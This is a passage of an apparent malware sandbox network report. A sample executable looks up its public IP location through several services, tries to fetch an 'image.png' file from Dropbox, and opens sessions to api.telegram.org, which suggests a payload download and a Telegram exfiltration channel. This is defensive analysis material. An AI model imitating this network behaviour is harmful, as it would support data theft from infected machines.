Dec 31, 2024 15:02:37.393686056 CET	49727	443	192.168.2.9	149.154.167.220
Dec 31, 2024 15:02:37.393704891 CET	49727	443	192.168.2.9	149.154.167.220
Dec 31, 2024 15:02:37.393733025 CET	49727	443	192.168.2.9	149.154.167.220
Dec 31, 2024 15:02:37.393783092 CET	49727	443	192.168.2.9	149.154.167.220
Dec 31, 2024 15:02:37.393851042 CET	49727	443	192.168.2.9	149.154.167.220
Dec 31, 2024 15:02:37.402338982 CET	443	49727	149.154.167.220	192.168.2.9
Dec 31, 2024 15:02:37.402623892 CET	49727	443	192.168.2.9	149.154.167.220
Dec 31, 2024 15:02:37.402647972 CET	443	49727	149.154.167.220	192.168.2.9
Dec 31, 2024 15:02:37.402694941 CET	49727	443	192.168.2.9	149.154.167.220
Dec 31, 2024 15:02:37.402723074 CET	49727	443	192.168.2.9	149.154.167.220
Dec 31, 2024 15:02:37.402739048 CET	49727	443	192.168.2.9	149.154.167.220
Dec 31, 2024 15:02:37.402755976 CET	49727	443	192.168.2.9	149.154.167.220
Dec 31, 2024 15:02:37.402807951 CET	49727	443	192.168.2.9	149.154.167.220
Dec 31, 2024 15:02:37.403024912 CET	49727	443	192.168.2.9	149.154.167.220
Dec 31, 2024 15:02:37.407161951 CET	443	49727	149.154.167.220	192.168.2.9
Dec 31, 2024 15:02:37.407371998 CET	49727	443	192.168.2.9	149.154.167.220
Dec 31, 2024 15:02:37.407391071 CET	443	49727	149.154.167.220	192.168.2.9
Dec 31, 2024 15:02:37.407437086 CET	49727	443	192.168.2.9	149.154.167.220
Dec 31, 2024 15:02:37.407494068 CET	49727	443	192.168.2.9	149.154.167.220
Dec 31, 2024 15:02:37.407511950 CET	49727	443	192.168.2.9	149.154.167.220
Dec 31, 2024 15:02:37.407569885 CET	49727	443	192.168.2.9	149.154.167.220
Dec 31, 2024 15:02:37.407613993 CET	49727	443	192.168.2.9	149.154.167.220
Dec 31, 2024 15:02:37.407681942 CET	49727	443	192.168.2.9	149.154.167.220
Dec 31, 2024 15:02:37.407732964 CET	49727	443	192.168.2.9	149.154.167.220
Dec 31, 2024 15:02:37.407766104 CET	49727	443	192.168.2.9	149.154.167.220
Dec 31, 2024 15:02:37.407797098 CET	443	49727	149.154.167.220	192.168.2.9
Dec 31, 2024 15:02:37.407824039 CET	49727	443	192.168.2.9	149.154.167.220
Dec 31, 2024 15:02:37.407831907 CET	443	49727	149.154.167.220	192.168.2.9
Dec 31, 2024 15:02:37.408008099 CET	49727	443	192.168.2.9	149.154.167.220
Dec 31, 2024 15:02:37.408025026 CET	443	49727	149.154.167.220	192.168.2.9
Dec 31, 2024 15:02:37.408102989 CET	49727	443	192.168.2.9	149.154.167.220
Dec 31, 2024 15:02:37.451340914 CET	443	49727	149.154.167.220	192.168.2.9
Dec 31, 2024 15:02:38.188020945 CET	443	49727	149.154.167.220	192.168.2.9
Dec 31, 2024 15:02:38.188100100 CET	443	49727	149.154.167.220	192.168.2.9
Dec 31, 2024 15:02:38.188241959 CET	49727	443	192.168.2.9	149.154.167.220
Dec 31, 2024 15:02:38.194185019 CET	49727	443	192.168.2.9	149.154.167.220
Dec 31, 2024 15:02:38.321526051 CET	49724	80	192.168.2.9	208.95.112.1
Dec 31, 2024 15:02:53.881298065 CET	52799	53	192.168.2.9	162.159.36.2
Dec 31, 2024 15:02:53.886143923 CET	53	52799	162.159.36.2	192.168.2.9
Dec 31, 2024 15:02:53.886221886 CET	52799	53	192.168.2.9	162.159.36.2
Dec 31, 2024 15:02:53.886291027 CET	52799	53	192.168.2.9	162.159.36.2
Dec 31, 2024 15:02:53.891031027 CET	53	52799	162.159.36.2	192.168.2.9
Dec 31, 2024 15:02:54.339723110 CET	53	52799	162.159.36.2	192.168.2.9
Dec 31, 2024 15:02:54.340357065 CET	52799	53	192.168.2.9	162.159.36.2
Dec 31, 2024 15:02:54.345338106 CET	53	52799	162.159.36.2	192.168.2.9
Dec 31, 2024 15:02:54.345410109 CET	52799	53	192.168.2.9	162.159.36.2

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 31, 2024 15:02:22.340310097 CET	57400	53	192.168.2.9	1.1.1.1
Dec 31, 2024 15:02:22.340996027 CET	55928	53	192.168.2.9	1.1.1.1
Dec 31, 2024 15:02:22.347165108 CET	53	57400	1.1.1.1	192.168.2.9
Dec 31, 2024 15:02:22.359433889 CET	53	55928	1.1.1.1	192.168.2.9
Dec 31, 2024 15:02:23.028285027 CET	60774	53	192.168.2.9	1.1.1.1
Dec 31, 2024 15:02:23.037807941 CET	53	60774	1.1.1.1	192.168.2.9
Dec 31, 2024 15:02:28.634835958 CET	53024	53	192.168.2.9	1.1.1.1
Dec 31, 2024 15:02:28.641824961 CET	53	53024	1.1.1.1	192.168.2.9
Dec 31, 2024 15:02:29.230214119 CET	50509	53	192.168.2.9	1.1.1.1
Dec 31, 2024 15:02:29.239139080 CET	53	50509	1.1.1.1	192.168.2.9
Dec 31, 2024 15:02:36.466253996 CET	52611	53	192.168.2.9	1.1.1.1
Dec 31, 2024 15:02:36.472865105 CET	53	52611	1.1.1.1	192.168.2.9
Dec 31, 2024 15:02:53.880767107 CET	53	62609	162.159.36.2	192.168.2.9
Dec 31, 2024 15:02:54.355608940 CET	51090	53	192.168.2.9	1.1.1.1
Dec 31, 2024 15:02:54.362732887 CET	53	51090	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 31, 2024 15:02:22.340310097 CET	192.168.2.9	1.1.1.1	0x84fd	Standard query (0)	freegeoip.app	A (IP address)	IN (0x0001)	false
Dec 31, 2024 15:02:22.340996027 CET	192.168.2.9	1.1.1.1	0x2bae	Standard query (0)	dl.dropboxusercontent.com	A (IP address)	IN (0x0001)	false
Dec 31, 2024 15:02:23.028285027 CET	192.168.2.9	1.1.1.1	0xdf3e	Standard query (0)	ipbase.com	A (IP address)	IN (0x0001)	false
Dec 31, 2024 15:02:28.634835958 CET	192.168.2.9	1.1.1.1	0x2e	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Dec 31, 2024 15:02:29.230214119 CET	192.168.2.9	1.1.1.1	0x6090	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Dec 31, 2024 15:02:36.466253996 CET	192.168.2.9	1.1.1.1	0xa2bc	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Dec 31, 2024 15:02:54.355608940 CET	192.168.2.9	1.1.1.1	0x3ba8	Standard query (0)	241.42.69.40.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 31, 2024 15:02:22.347165108 CET	1.1.1.1	192.168.2.9	0x84fd	No error (0)	freegeoip.app		188.114.97.3	A (IP address)	IN (0x0001)	false
Dec 31, 2024 15:02:22.347165108 CET	1.1.1.1	192.168.2.9	0x84fd	No error (0)	freegeoip.app		188.114.96.3	A (IP address)	IN (0x0001)	false
Dec 31, 2024 15:02:22.359433889 CET	1.1.1.1	192.168.2.9	0x2bae	No error (0)	dl.dropboxusercontent.com	edge-block-www-env.dropbox-dns.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 31, 2024 15:02:22.359433889 CET	1.1.1.1	192.168.2.9	0x2bae	No error (0)	edge-block-www-env.dropbox-dns.com		162.125.66.15	A (IP address)	IN (0x0001)	false
Dec 31, 2024 15:02:23.037807941 CET	1.1.1.1	192.168.2.9	0xdf3e	No error (0)	ipbase.com		104.21.85.189	A (IP address)	IN (0x0001)	false
Dec 31, 2024 15:02:23.037807941 CET	1.1.1.1	192.168.2.9	0xdf3e	No error (0)	ipbase.com		172.67.209.71	A (IP address)	IN (0x0001)	false
Dec 31, 2024 15:02:28.641824961 CET	1.1.1.1	192.168.2.9	0x2e	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Dec 31, 2024 15:02:28.641824961 CET	1.1.1.1	192.168.2.9	0x2e	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Dec 31, 2024 15:02:28.641824961 CET	1.1.1.1	192.168.2.9	0x2e	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Dec 31, 2024 15:02:29.239139080 CET	1.1.1.1	192.168.2.9	0x6090	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Dec 31, 2024 15:02:36.472865105 CET	1.1.1.1	192.168.2.9	0xa2bc	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Dec 31, 2024 15:02:39.852477074 CET	1.1.1.1	192.168.2.9	0x1c0f	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Dec 31, 2024 15:02:39.852477074 CET	1.1.1.1	192.168.2.9	0x1c0f	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Dec 31, 2024 15:02:40.461764097 CET	1.1.1.1	192.168.2.9	0x83ea	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 31, 2024 15:02:40.461764097 CET	1.1.1.1	192.168.2.9	0x83ea	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Dec 31, 2024 15:02:52.882229090 CET	1.1.1.1	192.168.2.9	0x6d89	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 31, 2024 15:02:52.882229090 CET	1.1.1.1	192.168.2.9	0x6d89	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Dec 31, 2024 15:02:54.362732887 CET	1.1.1.1	192.168.2.9	0x3ba8	Name error (3)	241.42.69.40.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false

HTTP Request Dependency Graph

freegeoip.app

dl.dropboxusercontent.com

ipbase.com

api.ipify.org

api.telegram.org

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49718	208.95.112.1	80	6624	C:\Users\user\Desktop\vEtDFkAZjO.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 15:02:29.244919062 CET	63	OUT	GET /xml HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Dec 31, 2024 15:02:29.720521927 CET	642	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 14:02:29 GMT Content-Type: application/xml; charset=utf-8 Content-Length: 466 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 0a 20 20 3c 73 74 61 74 75 73 3e 73 75 63 63 65 73 73 3c 2f 73 74 61 74 75 73 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 20 20 3c 72 65 67 69 6f 6e 3e 4e 59 3c 2f 72 65 67 69 6f 6e 3e 0a 20 20 3c 72 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 72 65 67 69 6f 6e 4e 61 6d 65 3e 0a 20 20 3c 63 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 63 69 74 79 3e 0a 20 20 3c 7a 69 70 3e 31 30 31 32 33 3c 2f 7a 69 70 3e 0a 20 20 3c 6c 61 74 3e 34 30 2e 37 31 32 38 3c 2f 6c 61 74 3e 0a 20 20 3c 6c 6f 6e 3e 2d 37 34 2e 30 30 36 3c 2f 6c 6f 6e 3e 0a 20 20 3c 74 69 6d 65 7a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 74 69 6d 65 7a 6f 6e 65 3e 0a 20 20 3c 69 73 70 3e 4c 65 76 65 6c 20 33 [TRUNCATED] Data Ascii: <?xml version="1.0" encoding="UTF-8"?><query> <status>success</status> <country>United States</country> <countryCode>US</countryCode> <region>NY</region> <regionName>New York</regionName> <city>New York</city> <zip>10123</zip> <lat>40.7128</lat> <lon>-74.006</lon> <timezone>America/New_York</timezone> <isp>Level 3</isp> <org>CenturyLink Communications, LLC</org> <as>AS3356 Level 3 Parent, LLC</as> <query>8.46.123.189</query></query>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49722	208.95.112.1	80	6624	C:\Users\user\Desktop\vEtDFkAZjO.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 15:02:33.211905956 CET	63	OUT	GET /xml HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Dec 31, 2024 15:02:33.739288092 CET	642	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 14:02:32 GMT Content-Type: application/xml; charset=utf-8 Content-Length: 466 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 0a 20 20 3c 73 74 61 74 75 73 3e 73 75 63 63 65 73 73 3c 2f 73 74 61 74 75 73 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 20 20 3c 72 65 67 69 6f 6e 3e 4e 59 3c 2f 72 65 67 69 6f 6e 3e 0a 20 20 3c 72 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 72 65 67 69 6f 6e 4e 61 6d 65 3e 0a 20 20 3c 63 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 63 69 74 79 3e 0a 20 20 3c 7a 69 70 3e 31 30 31 32 33 3c 2f 7a 69 70 3e 0a 20 20 3c 6c 61 74 3e 34 30 2e 37 31 32 38 3c 2f 6c 61 74 3e 0a 20 20 3c 6c 6f 6e 3e 2d 37 34 2e 30 30 36 3c 2f 6c 6f 6e 3e 0a 20 20 3c 74 69 6d 65 7a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 74 69 6d 65 7a 6f 6e 65 3e 0a 20 20 3c 69 73 70 3e 4c 65 76 65 6c 20 33 [TRUNCATED] Data Ascii: <?xml version="1.0" encoding="UTF-8"?><query> <status>success</status> <country>United States</country> <countryCode>US</countryCode> <region>NY</region> <regionName>New York</regionName> <city>New York</city> <zip>10123</zip> <lat>40.7128</lat> <lon>-74.006</lon> <timezone>America/New_York</timezone> <isp>Level 3</isp> <org>CenturyLink Communications, LLC</org> <as>AS3356 Level 3 Parent, LLC</as> <query>8.46.123.189</query></query>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49724	208.95.112.1	80	6624	C:\Users\user\Desktop\vEtDFkAZjO.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 15:02:34.398140907 CET	39	OUT	GET /xml HTTP/1.1 Host: ip-api.com
Dec 31, 2024 15:02:34.916517019 CET	642	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 14:02:34 GMT Content-Type: application/xml; charset=utf-8 Content-Length: 466 Access-Control-Allow-Origin: * X-Ttl: 58 X-Rl: 43 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 0a 20 20 3c 73 74 61 74 75 73 3e 73 75 63 63 65 73 73 3c 2f 73 74 61 74 75 73 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 20 20 3c 72 65 67 69 6f 6e 3e 4e 59 3c 2f 72 65 67 69 6f 6e 3e 0a 20 20 3c 72 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 72 65 67 69 6f 6e 4e 61 6d 65 3e 0a 20 20 3c 63 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 63 69 74 79 3e 0a 20 20 3c 7a 69 70 3e 31 30 31 32 33 3c 2f 7a 69 70 3e 0a 20 20 3c 6c 61 74 3e 34 30 2e 37 31 32 38 3c 2f 6c 61 74 3e 0a 20 20 3c 6c 6f 6e 3e 2d 37 34 2e 30 30 36 3c 2f 6c 6f 6e 3e 0a 20 20 3c 74 69 6d 65 7a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 74 69 6d 65 7a 6f 6e 65 3e 0a 20 20 3c 69 73 70 3e 4c 65 76 65 6c 20 33 [TRUNCATED] Data Ascii: <?xml version="1.0" encoding="UTF-8"?><query> <status>success</status> <country>United States</country> <countryCode>US</countryCode> <region>NY</region> <regionName>New York</regionName> <city>New York</city> <zip>10123</zip> <lat>40.7128</lat> <lon>-74.006</lon> <timezone>America/New_York</timezone> <isp>Level 3</isp> <org>CenturyLink Communications, LLC</org> <as>AS3356 Level 3 Parent, LLC</as> <query>8.46.123.189</query></query>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.9	49725	208.95.112.1	80	6624	C:\Users\user\Desktop\vEtDFkAZjO.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 15:02:35.339112997 CET	63	OUT	GET /xml HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Dec 31, 2024 15:02:35.858038902 CET	642	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 14:02:35 GMT Content-Type: application/xml; charset=utf-8 Content-Length: 466 Access-Control-Allow-Origin: * X-Ttl: 57 X-Rl: 42 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 0a 20 20 3c 73 74 61 74 75 73 3e 73 75 63 63 65 73 73 3c 2f 73 74 61 74 75 73 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 20 20 3c 72 65 67 69 6f 6e 3e 4e 59 3c 2f 72 65 67 69 6f 6e 3e 0a 20 20 3c 72 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 72 65 67 69 6f 6e 4e 61 6d 65 3e 0a 20 20 3c 63 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 63 69 74 79 3e 0a 20 20 3c 7a 69 70 3e 31 30 31 32 33 3c 2f 7a 69 70 3e 0a 20 20 3c 6c 61 74 3e 34 30 2e 37 31 32 38 3c 2f 6c 61 74 3e 0a 20 20 3c 6c 6f 6e 3e 2d 37 34 2e 30 30 36 3c 2f 6c 6f 6e 3e 0a 20 20 3c 74 69 6d 65 7a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 74 69 6d 65 7a 6f 6e 65 3e 0a 20 20 3c 69 73 70 3e 4c 65 76 65 6c 20 33 [TRUNCATED] Data Ascii: <?xml version="1.0" encoding="UTF-8"?><query> <status>success</status> <country>United States</country> <countryCode>US</countryCode> <region>NY</region> <regionName>New York</regionName> <city>New York</city> <zip>10123</zip> <lat>40.7128</lat> <lon>-74.006</lon> <timezone>America/New_York</timezone> <isp>Level 3</isp> <org>CenturyLink Communications, LLC</org> <as>AS3356 Level 3 Parent, LLC</as> <query>8.46.123.189</query></query>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49706	188.114.97.3	443	6624	C:\Users\user\Desktop\vEtDFkAZjO.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 14:02:22 UTC	67	OUT	GET /xml/ HTTP/1.1 Host: freegeoip.app Connection: Keep-Alive
2024-12-31 14:02:23 UTC	852	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 31 Dec 2024 14:02:22 GMT Content-Type: text/html Content-Length: 167 Connection: close Cache-Control: max-age=3600 Expires: Tue, 31 Dec 2024 15:02:22 GMT Location: https://ipbase.com/xml/ Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tJCRAi5xbGngCmCqmVGcgGrI1D7ubNcT3exdNqWkvLuYkkRHVmxuAvysVt6FAIpwlAJMXJGLeXKTaim5bqh4c6zU5Gev0G%2FUqwuEKL7leo%2Fj5OHAMfkQh3ZpoGZmLPM%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8faace959842f797-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1477&min_rtt=1473&rtt_var=560&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=681&delivery_rate=1938911&cwnd=162&unsent_bytes=0&cid=585e02d562cc8e6b&ts=191&x=0"
2024-12-31 14:02:23 UTC	167	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49708	162.125.66.15	443	6624	C:\Users\user\Desktop\vEtDFkAZjO.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 14:02:23 UTC	107	OUT	GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1 Host: dl.dropboxusercontent.com Connection: Keep-Alive
2024-12-31 14:02:23 UTC	441	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Content-Security-Policy: sandbox allow-forms allow-scripts Date: Tue, 31 Dec 2024 14:02:23 GMT Server: envoy Content-Length: 925 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Robots-Tag: noindex, nofollow, noimageindex Vary: Accept-Encoding X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: 5d2a882728b44f62aa094ef004c939a7 Connection: close
2024-12-31 14:02:23 UTC	925	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49707	162.125.66.15	443	6624	C:\Users\user\Desktop\vEtDFkAZjO.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 14:02:23 UTC	107	OUT	GET /s/n41axwfwvc7fb8d/image.png?dl=1 HTTP/1.1 Host: dl.dropboxusercontent.com Connection: Keep-Alive
2024-12-31 14:02:23 UTC	441	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Content-Security-Policy: sandbox allow-forms allow-scripts Date: Tue, 31 Dec 2024 14:02:23 GMT Server: envoy Content-Length: 925 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Robots-Tag: noindex, nofollow, noimageindex Vary: Accept-Encoding X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: 947f28207dc84e84a692c17684a10935 Connection: close
2024-12-31 14:02:23 UTC	925	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 33 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 403</title><link href="https://cfl.dropboxstatic.com/static/metaserve

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.9	49709	104.21.85.189	443	6624	C:\Users\user\Desktop\vEtDFkAZjO.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 14:02:23 UTC	64	OUT	GET /xml/ HTTP/1.1 Host: ipbase.com Connection: Keep-Alive
2024-12-31 14:02:23 UTC	945	IN	HTTP/1.1 404 Not Found Date: Tue, 31 Dec 2024 14:02:23 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Age: 0 Cache-Control: public,max-age=0,must-revalidate Cache-Status: "Netlify Edge"; fwd=miss Vary: Accept-Encoding X-Nf-Request-Id: 01JGEGCQ0AQGFSYG64EG5XWPT7 cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G6DYbNS%2BZsnQV4bGdqnSoXR9SaqryZmoN4Yj3pk5jgfXF3drGSkGUfZATZMYrGSUkLSpqVRhfMV9h5gpl3Jp1UkHC1dFnlLPMhgTbBt2H9yot8erCMjoyZzD08ht"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8faace99591843a3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1714&min_rtt=1701&rtt_var=665&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2818&recv_bytes=678&delivery_rate=1611479&cwnd=223&unsent_bytes=0&cid=04cfa1171636af54&ts=231&x=0"
